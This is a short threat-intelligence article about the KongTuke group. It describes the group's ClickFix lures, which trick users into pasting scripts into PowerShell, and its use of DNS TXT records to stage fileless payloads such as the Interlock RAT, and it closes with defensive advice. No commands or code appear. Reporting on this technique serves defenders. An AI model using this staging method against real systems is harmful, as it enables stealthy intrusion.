“`html
The cybersecurity domain has become more ominous due to the intricate advancements of the KongTuke operation. Active since the middle of 2025, this group of threat actors has consistently honed its methods to circumvent traditional enterprise security measures.
Their main tool remains the “ClickFix” approach, a manipulation method that misleads unknowing individuals to rectify phony website malfunctions manually.
During these assaults, targets encounter fraudulent browser errors or verification captchas on compromised authentic sites.
Misleading instructions encourage them to copy a harmful script and paste it directly into the Windows Run dialog or a PowerShell interface.
This “self-infliction” strategy skillfully circumvents automated download safeguards by utilizing the user’s own system privileges to run unauthorized code.
Nonetheless, a notable enhancement in technical expertise has recently emerged. Unit 42 analysts discovered that the most recent versions of KongTuke are now utilizing DNS TXT records to discreetly hide their forthcoming phase.
Rather than contacting a flagged web server through HTTP, the initial script queries the DNS entries of a seemingly legitimate domain to extract malicious staging directives from the record.
This approach considerably complicates detection for defenders who depend on standard HTTP traffic examination.
By embedding the payload into DNS replies, attackers effortlessly integrate their harmful traffic with the persistent background static of internet resolution.
The overarching objective remains the deployment of significant malware, frequently resulting in the installation of the Interlock remote access trojan or other enduring threats within the network.
Mechanism of DNS TXT Staging
The technical innovation lies in the method of payload retrieval. When the target executes the initial ClickFix snippet, it does not immediately download a file.
Instead, it activates a PowerShell command that performs a DNS query for a designated TXT record.
These records, typically meant to store text information for domain validation, include the staged command string needed to acquire and execute the final payload.
Security measures often permit DNS traffic without restrictions to guarantee connectivity, creating a perilous blind spot.
The script extracts the text from the DNS response and executes it in memory, leaving negligible traces on the disk.
This “fileless” acquisition enables the KongTuke operation to maintain a discreet presence while establishing persistence on compromised endpoints.
Advisories include blocking newly registered domains, scrutinizing DNS traffic for irregularities, and meticulously monitoring PowerShell execution logs for dubious DNS lookup commands.
“`